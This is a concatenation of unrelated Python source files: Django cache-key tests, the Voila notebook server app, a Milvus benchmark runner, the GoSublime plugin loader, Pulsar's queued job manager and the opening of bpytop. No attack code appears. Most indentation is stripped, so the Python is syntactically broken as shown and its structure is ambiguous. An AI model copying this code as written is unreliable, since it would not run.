request = self.factory.get(self.path)
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# A specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
class TestMakeTemplateFragmentKey(SimpleTestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key, 'template.cache.foo.493e283d571a73056196f1a68efd0f66')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key, 'template.cache.bar.17c1a507a0cb58384f4c639067a93520')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key, 'template.cache.spam.06c8ae8e8c430b69fb0a6443504153dc')
def test_with_ints_vary_on(self):
key = make_template_fragment_key('foo', [1, 2, 3, 4, 5])
self.assertEqual(key, 'template.cache.foo.7ae8fd2e0d25d651c683bdeebdb29461')
def test_with_unicode_vary_on(self):
key = make_template_fragment_key('foo', ['42º', '😀'])
self.assertEqual(key, 'template.cache.foo.7ced1c94e543668590ba39b3c08b0237')
def test_long_vary_on(self):
key = make_template_fragment_key('foo', ['x' * 10000])
self.assertEqual(key, 'template.cache.foo.3670b349b5124aa56bdb50678b02b23a')
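    # Each key above has the form 'template.cache.<fragment_name>.<md5>', where
    # the hash is derived from the vary_on values; with no vary_on the hash is
    # the MD5 of empty input (d41d8cd98f00b204e9800998ecf8427e).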
class CacheHandlerTest(SimpleTestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertIsNot(c[0], c[1])
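    # The handler stores cache connections per thread, so each runner() thread
    # above gets its own backend instance, which is what assertIsNot checks.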
def test_nonexistent_alias(self):
msg = "The connection 'nonexistent' doesn't exist."
with self.assertRaisesMessage(InvalidCacheBackendError, msg):
caches['nonexistent']
def test_nonexistent_backend(self):
test_caches = CacheHandler({
'invalid_backend': {
'BACKEND': 'django.nonexistent.NonexistentBackend',
},
})
msg = (
"Could not find backend 'django.nonexistent.NonexistentBackend': "
"No module named 'django.nonexistent'"
)
with self.assertRaisesMessage(InvalidCacheBackendError, msg):
test_caches['invalid_backend']
def test_all(self):
test_caches = CacheHandler({
'cache_1': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
},
'cache_2': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
},
})
self.assertEqual(test_caches.all(initialized_only=True), [])
cache_1 = test_caches['cache_1']
self.assertEqual(test_caches.all(initialized_only=True), [cache_1])
self.assertEqual(len(test_caches.all()), 2)
# .all() initializes all caches.
self.assertEqual(len(test_caches.all(initialized_only=True)), 2)
self.assertEqual(test_caches.all(), test_caches.all(initialized_only=True))
|
app.py
|
#############################################################################
# Copyright (c) 2018, Voila Contributors #
# Copyright (c) 2018, QuantStack #
# #
# Distributed under the terms of the BSD 3-Clause License. #
# #
# The full license is in the file LICENSE, distributed with this software. #
#############################################################################
from zmq.eventloop import ioloop
import gettext
import io
import logging
import threading
import tempfile
import os
import shutil
import signal
import socket
import webbrowser
import errno
import random
try:
from urllib.parse import urljoin
from urllib.request import pathname2url
except ImportError:
from urllib import pathname2url
from urlparse import urljoin
import jinja2
import tornado.ioloop
import tornado.web
from traitlets.config.application import Application
from traitlets import Unicode, Integer, Bool, Dict, List, default
from jupyter_server.services.kernels.kernelmanager import MappingKernelManager
from jupyter_server.services.kernels.handlers import KernelHandler, ZMQChannelsHandler
from jupyter_server.services.contents.largefilemanager import LargeFileManager
from jupyter_server.base.handlers import path_regex
from jupyter_server.utils import url_path_join
from jupyter_server.services.config import ConfigManager
from jupyter_server.base.handlers import FileFindHandler
from jupyter_client.kernelspec import KernelSpecManager
from jupyter_core.paths import jupyter_config_path, jupyter_path
from ipython_genutils.py3compat import getcwd
from .paths import ROOT, STATIC_ROOT, collect_template_paths
from .handler import VoilaHandler
from .treehandler import VoilaTreeHandler
from ._version import __version__
from .static_file_handler import MultiStaticFileHandler, WhiteListFileHandler
from .configuration import VoilaConfiguration
from .execute import VoilaExecutePreprocessor
from .exporter import VoilaExporter
from .csspreprocessor import VoilaCSSPreprocessor
ioloop.install()
_kernel_id_regex = r"(?P<kernel_id>\w+-\w+-\w+-\w+-\w+)"
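# Matches UUID-shaped kernel ids, i.e. five dash-separated groups of word
# characters, e.g. '9f3e0f9b-0d69-4b52-a382-6a47f03a2b58'.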
def _(x):
return x
class Voila(Application):
name = 'voila'
version = __version__
examples = 'voila example.ipynb --port 8888'
flags = {
'debug': ({'Voila': {'log_level': logging.DEBUG}}, _("Set the log level to logging.DEBUG")),
'no-browser': ({'Voila': {'open_browser': False}}, _('Don\'t open the notebook in a browser after startup.'))
}
description = Unicode(
"""voila [OPTIONS] NOTEBOOK_FILENAME
This launches a stand-alone server for read-only notebooks.
"""
)
option_description = Unicode(
"""
notebook_path:
File name of the Jupyter notebook to display.
"""
)
notebook_filename = Unicode()
port = Integer(
8866,
config=True,
help=_(
'Port of the voila server. Default 8866.'
)
)
autoreload = Bool(
False,
config=True,
help=_(
            'Will autoreload the server and the page when a template, js file or Python code changes'
)
)
root_dir = Unicode(config=True, help=_('The directory to use for notebooks.'))
static_root = Unicode(
STATIC_ROOT,
config=True,
help=_(
'Directory holding static assets (HTML, JS and CSS files).'
)
)
aliases = {
'port': 'Voila.port',
'static': 'Voila.static_root',
'strip_sources': 'VoilaConfiguration.strip_sources',
'autoreload': 'Voila.autoreload',
'template': 'VoilaConfiguration.template',
'theme': 'VoilaConfiguration.theme',
'base_url': 'Voila.base_url',
'server_url': 'Voila.server_url',
'enable_nbextensions': 'VoilaConfiguration.enable_nbextensions'
}
classes = [
VoilaConfiguration,
VoilaExecutePreprocessor,
VoilaExporter,
VoilaCSSPreprocessor
]
connection_dir_root = Unicode(
config=True,
help=_(
            'Location of temporary connection files. Defaults '
'to system `tempfile.gettempdir()` value.'
)
)
connection_dir = Unicode()
base_url = Unicode(
'/',
config=True,
help=_(
'Path for voila API calls. If server_url is unset, this will be \
used for both the base route of the server and the client. \
If server_url is set, the server will serve the routes prefixed \
by server_url, while the client will prefix by base_url (this is \
useful in reverse proxies).'
)
)
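    # Hypothetical usage sketch (values assumed, not taken from the docs):
    # behind a reverse proxy that exposes the app under /voila/ while the
    # process itself serves from the root, one might run:
    #   voila --base_url=/voila/ --server_url=/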
server_url = Unicode(
None,
config=True,
allow_none=True,
help=_(
            'Path prefix for the voila API handlers. Leave unset to default to base_url'
)
)
notebook_path = Unicode(
None,
config=True,
allow_none=True,
help=_(
'path to notebook to serve with voila'
)
)
nbconvert_template_paths = List(
[],
config=True,
help=_(
'path to nbconvert templates'
)
)
template_paths = List(
[],
allow_none=True,
config=True,
help=_(
'path to nbconvert templates'
)
)
static_paths = List(
[STATIC_ROOT],
config=True,
help=_(
'paths to static assets'
)
)
port_retries = Integer(50, config=True,
help=_("The number of additional ports to try if the specified port is not available.")
)
ip = Unicode('localhost', config=True,
help=_("The IP address the notebook server will listen on."))
open_browser = Bool(True, config=True,
help=_("""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
"""))
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webbrowser_open_new = Integer(2, config=True,
help=_("""Specify Where to open the notebook on startup. This is the
`new` argument passed to the standard library method `webbrowser.open`.
The behaviour is not guaranteed, but depends on browser support. Valid
values are:
- 2 opens a new tab,
- 1 opens a new window,
- 0 opens in an existing window.
See the `webbrowser.open` documentation for details.
"""))
custom_display_url = Unicode(u'', config=True,
help=_("""Override URL shown to users.
Replace actual URL, including protocol, address, port and base URL,
with the given value when displaying URL to the users. Do not change
the actual connection URL. If authentication token is enabled, the
token is added to the custom URL automatically.
This option is intended to be used when the URL to display to the user
cannot be determined reliably by the Jupyter notebook server (proxified
or containerized setups for example)."""))
@property
def display_url(self):
if self.custom_display_url:
url = self.custom_display_url
if not url.endswith('/'):
url += '/'
else:
if self.ip in ('', '0.0.0.0'):
ip = "%s" % socket.gethostname()
else:
ip = self.ip
url = self._url(ip)
# TODO: do we want to have the token?
# if self.token:
# # Don't log full token if it came from config
# token = self.token if self._token_generated else '...'
# url = (url_concat(url, {'token': token})
# + '\n or '
# + url_concat(self._url('127.0.0.1'), {'token': token}))
return url
@property
def connection_url(self):
ip = self.ip if self.ip else 'localhost'
return self._url(ip)
def _url(self, ip):
# TODO: https / certfile
# proto = 'https' if self.certfile else 'http'
proto = 'http'
return "%s://%s:%i%s" % (proto, ip, self.port, self.base_url)
config_file_paths = List(
Unicode(),
config=True,
help=_(
'Paths to search for voila.(py|json)'
)
)
tornado_settings = Dict(
{},
config=True,
help=_(
'Extra settings to apply to tornado application, e.g. headers, ssl, etc'
)
)
@default('config_file_paths')
def _config_file_paths_default(self):
return [os.getcwd()] + jupyter_config_path()
@default('connection_dir_root')
def _default_connection_dir(self):
connection_dir = tempfile.gettempdir()
self.log.info('Using %s to store connection files' % connection_dir)
return connection_dir
@default('log_level')
def _default_log_level(self):
return logging.INFO
# similar to NotebookApp, except no extra path
@property
def nbextensions_path(self):
"""The path to look for Javascript notebook extensions"""
path = jupyter_path('nbextensions')
# FIXME: remove IPython nbextensions path after a migration period
try:
from IPython.paths import get_ipython_dir
except ImportError:
pass
else:
path.append(os.path.join(get_ipython_dir(), 'nbextensions'))
return path
@default('root_dir')
def _default_root_dir(self):
if self.notebook_path:
return os.path.dirname(os.path.abspath(self.notebook_path))
else:
return getcwd()
def initialize(self, argv=None):
self.log.debug("Searching path %s for config files", self.config_file_paths)
# to make config_file_paths settable via cmd line, we first need to parse it
super(Voila, self).initialize(argv)
if len(self.extra_args) == 1:
arg = self.extra_args[0]
# I am not sure why we need to check if self.notebook_path is set, can we get rid of this?
if not self.notebook_path:
if os.path.isdir(arg):
self.root_dir = arg
elif os.path.isfile(arg):
self.notebook_path = arg
else:
raise ValueError('argument is neither a file nor a directory: %r' % arg)
elif len(self.extra_args) != 0:
raise ValueError('provided more than 1 argument: %r' % self.extra_args)
# then we load the config
self.load_config_file('voila', path=self.config_file_paths)
# but that cli config has preference, so we overwrite with that
self.update_config(self.cli_config)
# common configuration options between the server extension and the application
self.voila_configuration = VoilaConfiguration(parent=self)
self.setup_template_dirs()
signal.signal(signal.SIGTERM, self._handle_signal_stop)
def setup_template_dirs(self):
if self.voila_configuration.template:
collect_template_paths(
self.nbconvert_template_paths,
self.static_paths,
self.template_paths,
self.voila_configuration.template)
self.log.debug('using template: %s', self.voila_configuration.template)
self.log.debug('nbconvert template paths:\n\t%s', '\n\t'.join(self.nbconvert_template_paths))
self.log.debug('template paths:\n\t%s', '\n\t'.join(self.template_paths))
self.log.debug('static paths:\n\t%s', '\n\t'.join(self.static_paths))
if self.notebook_path and not os.path.exists(self.notebook_path):
raise ValueError('Notebook not found: %s' % self.notebook_path)
def _handle_signal_stop(self, sig, frame):
self.log.info('Handle signal %s.' % sig)
self.ioloop.add_callback_from_signal(self.ioloop.stop)
def start(self):
self.connection_dir = tempfile.mkdtemp(
prefix='voila_',
dir=self.connection_dir_root
)
self.log.info('Storing connection files in %s.' % self.connection_dir)
self.log.info('Serving static files from %s.' % self.static_root)
self.kernel_spec_manager = KernelSpecManager(
parent=self
)
self.kernel_manager = MappingKernelManager(
parent=self,
connection_dir=self.connection_dir,
kernel_spec_manager=self.kernel_spec_manager,
allowed_message_types=[
'comm_msg',
'comm_info_request',
'kernel_info_request',
'shutdown_request'
]
)
jenv_opt = {"autoescape": True} # we might want extra options via cmd line like notebook server
env = jinja2.Environment(loader=jinja2.FileSystemLoader(self.template_paths), extensions=['jinja2.ext.i18n'], **jenv_opt)
nbui = gettext.translation('nbui', localedir=os.path.join(ROOT, 'i18n'), fallback=True)
env.install_gettext_translations(nbui, newstyle=False)
self.contents_manager = LargeFileManager(parent=self)
        # we create a config manager that loads both the serverconfig and nbconfig (classical notebook)
read_config_path = [os.path.join(p, 'serverconfig') for p in jupyter_config_path()]
read_config_path += [os.path.join(p, 'nbconfig') for p in jupyter_config_path()]
self.config_manager = ConfigManager(parent=self, read_config_path=read_config_path)
# default server_url to base_url
self.server_url = self.server_url or self.base_url
self.app = tornado.web.Application(
base_url=self.base_url,
server_url=self.server_url or self.base_url,
kernel_manager=self.kernel_manager,
kernel_spec_manager=self.kernel_spec_manager,
allow_remote_access=True,
autoreload=self.autoreload,
voila_jinja2_env=env,
jinja2_env=env,
static_path='/',
server_root_dir='/',
contents_manager=self.contents_manager,
config_manager=self.config_manager
)
self.app.settings.update(self.tornado_settings)
handlers = []
handlers.extend([
(url_path_join(self.server_url, r'/api/kernels/%s' % _kernel_id_regex), KernelHandler),
(url_path_join(self.server_url, r'/api/kernels/%s/channels' % _kernel_id_regex), ZMQChannelsHandler),
(
url_path_join(self.server_url, r'/voila/static/(.*)'),
MultiStaticFileHandler,
{
'paths': self.static_paths,
'default_filename': 'index.html'
}
)
])
# Serving notebook extensions
if self.voila_configuration.enable_nbextensions:
handlers.append(
(
url_path_join(self.server_url, r'/voila/nbextensions/(.*)'),
FileFindHandler,
{
'path': self.nbextensions_path,
'no_cache_paths': ['/'], # don't cache anything in nbextensions
},
)
)
handlers.append(
(
url_path_join(self.server_url, r'/voila/files/(.*)'),
WhiteListFileHandler,
{
'whitelist': self.voila_configuration.file_whitelist,
'blacklist': self.voila_configuration.file_blacklist,
'path': self.root_dir,
},
)
)
tree_handler_conf = {
'voila_configuration': self.voila_configuration
}
if self.notebook_path:
handlers.append((
url_path_join(self.server_url, r'/(.*)'),
VoilaHandler,
{
'notebook_path': os.path.relpath(self.notebook_path, self.root_dir),
'nbconvert_template_paths': self.nbconvert_template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}
))
else:
self.log.debug('serving directory: %r', self.root_dir)
handlers.extend([
(self.server_url, VoilaTreeHandler, tree_handler_conf),
(url_path_join(self.server_url, r'/voila/tree' + path_regex), VoilaTreeHandler, tree_handler_conf),
(url_path_join(self.server_url, r'/voila/render/(.*)'), VoilaHandler,
{
'nbconvert_template_paths': self.nbconvert_template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}),
])
self.app.add_handlers('.*$', handlers)
self.listen()
def stop(self):
shutil.rmtree(self.connection_dir)
self.kernel_manager.shutdown_all()
def random_ports(self, port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n-5):
yield max(1, port + random.randint(-2*n, 2*n))
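    # Illustrative example: random_ports(8866, 8) yields 8866..8870 first, then
    # 3 ports drawn from [8866 - 16, 8866 + 16] (clamped to be at least 1).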
def listen(self):
        success = None
        for port in self.random_ports(self.port, self.port_retries+1):
try:
self.app.listen(port)
self.port = port
self.log.info('Voila is running at:\n%s' % self.display_url)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.info(_('The port %i is already in use, trying another port.') % port)
continue
elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
self.log.warning(_("Permission to listen on port %i denied") % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
self.log.critical(_('ERROR: the voila server could not be started because '
'no available port could be found.'))
self.exit(1)
if self.open_browser:
self.launch_browser()
self.ioloop = tornado.ioloop.IOLoop.current()
try:
self.ioloop.start()
except KeyboardInterrupt:
self.log.info('Stopping...')
finally:
self.stop()
def launch_browser(self):
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warning(_('No web browser found: %s.') % e)
browser = None
if not browser:
return
uri = self.base_url
fd, open_file = tempfile.mkstemp(suffix='.html')
# Write a temporary file to open in the browser
with io.open(fd, 'w', encoding='utf-8') as fh:
# TODO: do we want to have the token?
# if self.token:
# url = url_concat(url, {'token': self.token})
url = url_path_join(self.connection_url, uri)
jinja2_env = self.app.settings['jinja2_env']
template = jinja2_env.get_template('browser-open.html')
fh.write(template.render(open_url=url, base_url=url))
def target():
return browser.open(urljoin('file:', pathname2url(open_file)), new=self.webbrowser_open_new)
threading.Thread(target=target).start()
main = Voila.launch_instance
|
local_runner.py
|
import os
import logging
import pdb
import time
import random
from multiprocessing import Process
import numpy as np
from client import MilvusClient
import utils
import parser
from runner import Runner
logger = logging.getLogger("milvus_benchmark.local_runner")
class LocalRunner(Runner):
"""run local mode"""
def __init__(self, ip, port):
super(LocalRunner, self).__init__()
self.ip = ip
self.port = port
def run(self, definition, run_type=None):
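        # Two run types are handled below: "performance" executes the
        # configured insert/query operations and reports timings, while
        # "stability" repeatedly mixes queries and inserts against an existing
        # table for a configured duration.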
if run_type == "performance":
for op_type, op_value in definition.items():
run_count = op_value["run_count"]
run_params = op_value["params"]
if op_type == "insert":
for index, param in enumerate(run_params):
table_name = param["table_name"]
# random_1m_100_512
(data_type, table_size, index_file_size, dimension, metric_type) = parser.table_parser(table_name)
milvus = MilvusClient(table_name, ip=self.ip, port=self.port)
# Check has table or not
if milvus.exists_table():
milvus.delete()
time.sleep(10)
milvus.create_table(table_name, dimension, index_file_size, metric_type)
res = self.do_insert(milvus, table_name, data_type, dimension, table_size, param["ni_per"])
logger.info(res)
elif op_type == "query":
for index, param in enumerate(run_params):
logger.info("Definition param: %s" % str(param))
table_name = param["dataset"]
(data_type, table_size, index_file_size, dimension, metric_type) = parser.table_parser(table_name)
milvus = MilvusClient(table_name, ip=self.ip, port=self.port)
# parse index info
index_types = param["index.index_types"]
nlists = param["index.nlists"]
# parse top-k, nq, nprobe
top_ks, nqs, nprobes = parser.search_params_parser(param)
for index_type in index_types:
for nlist in nlists:
milvus.create_index(index_type, nlist)
# preload index
milvus.preload_table()
# Run query test
for nprobe in nprobes:
logger.info("index_type: %s, nlist: %s, metric_type: %s, nprobe: %s" % (index_type, nlist, metric_type, nprobe))
res = self.do_query(milvus, table_name, top_ks, nqs, nprobe, run_count)
headers = [param["dataset"]]
headers.extend([str(top_k) for top_k in top_ks])
utils.print_table(headers, nqs, res)
elif run_type == "stability":
for op_type, op_value in definition.items():
if op_type != "query":
logger.warning("invalid operation: %s in accuracy test, only support query operation" % op_type)
break
run_count = op_value["run_count"]
run_params = op_value["params"]
nq = 10000
for index, param in enumerate(run_params):
logger.info("Definition param: %s" % str(param))
table_name = param["dataset"]
(data_type, table_size, index_file_size, dimension, metric_type) = parser.table_parser(table_name)
# set default test time
if "during_time" not in param:
during_time = 100 # seconds
else:
during_time = int(param["during_time"]) * 60
# set default query process num
if "query_process_num" not in param:
query_process_num = 10
else:
query_process_num = int(param["query_process_num"])
milvus = MilvusClient(table_name)
# Check has table or not
if not milvus.exists_table():
logger.warning("Table %s not existed, continue exec next params ..." % table_name)
continue
start_time = time.time()
insert_vectors = [[random.random() for _ in range(dimension)] for _ in range(nq)]
while time.time() < start_time + during_time:
processes = []
# # do query
# for i in range(query_process_num):
# milvus_instance = MilvusClient(table_name)
# top_k = random.choice([x for x in range(1, 100)])
# nq = random.choice([x for x in range(1, 1000)])
# nprobe = random.choice([x for x in range(1, 500)])
# logger.info(nprobe)
# p = Process(target=self.do_query, args=(milvus_instance, table_name, [top_k], [nq], 64, run_count, ))
# processes.append(p)
# p.start()
# time.sleep(0.1)
# for p in processes:
# p.join()
milvus_instance = MilvusClient(table_name)
top_ks = random.sample([x for x in range(1, 100)], 4)
nqs = random.sample([x for x in range(1, 1000)], 3)
nprobe = random.choice([x for x in range(1, 500)])
res = self.do_query(milvus, table_name, top_ks, nqs, nprobe, run_count)
# milvus_instance = MilvusClient(table_name)
status, res = milvus_instance.insert(insert_vectors, ids=[x for x in range(len(insert_vectors))])
if not status.OK():
logger.error(status.message)
if (time.time() - start_time) % 300 == 0:
status = milvus_instance.drop_index()
if not status.OK():
logger.error(status.message)
index_type = random.choice(["flat", "ivf_flat", "ivf_sq8"])
status = milvus_instance.create_index(index_type, 16384)
if not status.OK():
logger.error(status.message)
|
GoSublime.py
|
import os
import sublime
import sublime_plugin
import sys
import traceback
st2 = (sys.version_info[0] == 2)
dist_dir = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, dist_dir)
ANN = ''
VERSION = ''
MARGO_EXE = ''
fn = os.path.join(dist_dir, 'gosubl', 'about.py')
execErr = ''
try:
with open(fn) as f:
code = compile(f.read(), fn, 'exec')
exec(code)
except Exception:
execErr = "Error: failed to exec about.py: Exception: %s" % traceback.format_exc()
print("GoSublime: %s" % execErr)
def loadable_mods():
from .gosubl import gs
from .gosubl import sh
from .gosubl import margo
from .gosubl import mg9
return [
('gs', gs),
('sh', sh),
('margo', margo),
('mg9', mg9),
]
def plugin_loaded():
from threading import Thread
Thread(target=_plugin_loaded_async).start()
def _plugin_loaded_async():
from .gosubl import about
from .gosubl import sh
from .gosubl import ev
from .gosubl import gs
if VERSION != about.VERSION:
gs.show_output('GoSublime-main', '\n'.join([
'GoSublime has been updated.',
'New version: `%s`, current version: `%s`' % (VERSION, about.VERSION),
'Please restart Sublime Text to complete the update.',
execErr,
]))
return
if gs.attr('about.version'):
gs.show_output('GoSublime-main', '\n'.join([
'GoSublime appears to have been updated.',
'New ANNOUNCE: `%s`, current ANNOUNCE: `%s`' % (ANN, about.ANN),
'You may need to restart Sublime Text.',
]))
return
gs.set_attr('about.version', VERSION)
gs.set_attr('about.ann', ANN)
for mod_name, mod in loadable_mods():
print('GoSublime %s: %s.init()' % (VERSION, mod_name))
try:
mod.gs_init({
'version': VERSION,
'ann': ANN,
'margo_exe': MARGO_EXE,
})
except AttributeError:
pass
except TypeError:
# old versions didn't take an arg
mod.gs_init()
ev.init.post_add = lambda e, f: f()
ev.init()
def cb():
aso = gs.aso()
old_version = aso.get('version', '')
old_ann = aso.get('ann', '')
if about.VERSION > old_version or about.ANN > old_ann:
aso.set('version', about.VERSION)
aso.set('ann', about.ANN)
gs.save_aso()
gs.focus(gs.dist_path('CHANGELOG.md'))
sublime.set_timeout(cb, 0)
def plugin_unloaded():
for mod_name, mod in loadable_mods():
try:
fini = mod.gs_fini
except AttributeError:
continue
print('GoSublime %s: %s.fini()' % (VERSION, mod_name))
fini({
})
class GosublimeDoesntSupportSublimeText2(sublime_plugin.TextCommand):
def run(self, edit):
msg = '\n'.join([
'Sublime Text 2 is no longer supported by GoSublime',
'See https://github.com/DisposaBoy/GoSublime/blob/master/SUPPORT.md#sublime-text',
'',
'If you have a *good* reason to not upgrade to Sublime Text 3,',
'discuss it here https://github.com/DisposaBoy/GoSublime/issues/689',
'',
])
self.view.set_scratch(True)
self.view.set_syntax_file(gs.tm_path('9o'))
self.view.set_name('GoSublime no longer supports Sublime Text 2')
self.view.insert(edit, 0, msg)
self.view.set_read_only(True)
if st2:
def cb():
view = sublime.active_window().new_file()
view.run_command('gosublime_doesnt_support_sublime_text2')
sublime.set_timeout(cb, 1000)
|
queued.py
|
import os
import multiprocessing
from six.moves import queue
import threading
import traceback
from pulsar.managers.unqueued import Manager
from logging import getLogger
log = getLogger(__name__)
STOP_SIGNAL = object()
RUN = object()
# Number of concurrent jobs used by default for
# QueueManager.
DEFAULT_NUM_CONCURRENT_JOBS = 1
JOB_FILE_COMMAND_LINE = "command_line"
class QueueManager(Manager):
"""
A job manager that queues up jobs directly (i.e. does not use
external queuing software such as PBS, SGE, etc.).
"""
manager_type = "queued_python"
def __init__(self, name, app, **kwds):
super(QueueManager, self).__init__(name, app, **kwds)
num_concurrent_jobs = kwds.get('num_concurrent_jobs', DEFAULT_NUM_CONCURRENT_JOBS)
if num_concurrent_jobs == '*':
num_concurrent_jobs = multiprocessing.cpu_count()
else:
num_concurrent_jobs = int(num_concurrent_jobs)
self._init_worker_threads(num_concurrent_jobs)
def _init_worker_threads(self, num_concurrent_jobs):
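# Spin up daemon worker threads that pull (RUN, (job_id, command_line)) work items from the shared queue.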
self.work_queue = queue.Queue()
self.work_threads = []
for i in range(num_concurrent_jobs):
worker = threading.Thread(target=self.run_next)
worker.daemon = True
worker.start()
self.work_threads.append(worker)
def launch(self, job_id, command_line, submit_params={}, dependencies_description=None, env=[], setup_params=None):
command_line = self._prepare_run(
job_id,
command_line,
dependencies_description=dependencies_description,
env=env,
setup_params=setup_params
)
try:
self._job_directory(job_id).store_metadata(JOB_FILE_COMMAND_LINE, command_line)
except Exception:
log.info("Failed to persist command line for job %s, will not be able to recover." % job_id)
self.work_queue.put((RUN, (job_id, command_line)))
def _recover_active_job(self, job_id):
command_line = self._job_directory(job_id).load_metadata(JOB_FILE_COMMAND_LINE, None)
if command_line:
self.work_queue.put((RUN, (job_id, command_line)))
else:
raise Exception("Cannot recover job with id %s" % job_id)
def shutdown(self, timeout=None):
for i in range(len(self.work_threads)):
self.work_queue.put((STOP_SIGNAL, None))
for worker in self.work_threads:
worker.join(timeout)
if worker.is_alive():
log.warning("Failed to stop worker thread [%s]" % worker)
def run_next(self):
"""
Run the next item in the queue (a job waiting to run).
"""
while 1:
(op, obj) = self.work_queue.get()
if op is STOP_SIGNAL:
return
try:
(job_id, command_line) = obj
try:
os.remove(self._job_file(job_id, JOB_FILE_COMMAND_LINE))
except Exception:
log.exception("Running command but failed to delete - command may rerun on Pulsar boot.")
# _run will not do anything if job has been cancelled.
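# NOTE: "async" is a reserved keyword in Python 3.7+, so this keyword argument only parses on older interpreters and would need to be renamed on newer Python versions.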
self._run(job_id, command_line, async=False)
except Exception:
log.warning("Uncaught exception running job with job_id %s" % job_id)
traceback.print_exc()
|
bpytop.py
|
#!/usr/bin/env python3
# pylint: disable=not-callable, no-member, unsubscriptable-object
# indent = tab
# tab-size = 4
# Copyright 2020 Aristocratos (jakob@qvantnet.com)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, sys, io, threading, signal, re, subprocess, logging, logging.handlers, argparse
import urllib.request
from time import time, sleep, strftime, localtime
from datetime import timedelta
from _thread import interrupt_main
from collections import defaultdict
from select import select
from distutils.util import strtobool
from string import Template
from math import ceil, floor
from random import randint
from shutil import which
from typing import List, Set, Dict, Tuple, Optional, Union, Any, Callable, ContextManager, Iterable, Type, NamedTuple
errors: List[str] = []
try: import fcntl, termios, tty, pwd
except Exception as e: errors.append(f'{e}')
try: import psutil # type: ignore
except Exception as e: errors.append(f'{e}')
SELF_START = time()
SYSTEM: str
if "linux" in sys.platform: SYSTEM = "Linux"
elif "bsd" in sys.platform: SYSTEM = "BSD"
elif "darwin" in sys.platform: SYSTEM = "MacOS"
else: SYSTEM = "Other"
if errors:
print("ERROR!")
print("\n".join(errors))
if SYSTEM == "Other":
print("\nUnsupported platform!\n")
else:
print("\nInstall required modules!\n")
raise SystemExit(1)
VERSION: str = "1.0.61"
#? Argument parser ------------------------------------------------------------------------------->
args = argparse.ArgumentParser()
args.add_argument("-b", "--boxes", action="store", dest="boxes", help = "which boxes to show at start, example: -b \"cpu mem net proc\"")
args.add_argument("-lc", "--low-color", action="store_true", help = "disable truecolor, converts 24-bit colors to 256-color")
args.add_argument("-v", "--version", action="store_true", help = "show version info and exit")
args.add_argument("--debug", action="store_true", help = "start with loglevel set to DEBUG overriding value set in config")
stdargs = args.parse_args()
if stdargs.version:
print(f'bpytop version: {VERSION}\n'
f'psutil version: {".".join(str(x) for x in psutil.version_info)}')
raise SystemExit(0)
ARG_BOXES: str = stdargs.boxes
LOW_COLOR: bool = stdargs.low_color
DEBUG: bool = stdargs.debug
#? Variables ------------------------------------------------------------------------------------->
BANNER_SRC: List[Tuple[str, str, str]] = [
("#ffa50a", "#0fd7ff", "██████╗ ██████╗ ██╗ ██╗████████╗ ██████╗ ██████╗"),
("#f09800", "#00bfe6", "██╔══██╗██╔══██╗╚██╗ ██╔╝╚══██╔══╝██╔═══██╗██╔══██╗"),
("#db8b00", "#00a6c7", "██████╔╝██████╔╝ ╚████╔╝ ██║ ██║ ██║██████╔╝"),
("#c27b00", "#008ca8", "██╔══██╗██╔═══╝ ╚██╔╝ ██║ ██║ ██║██╔═══╝ "),
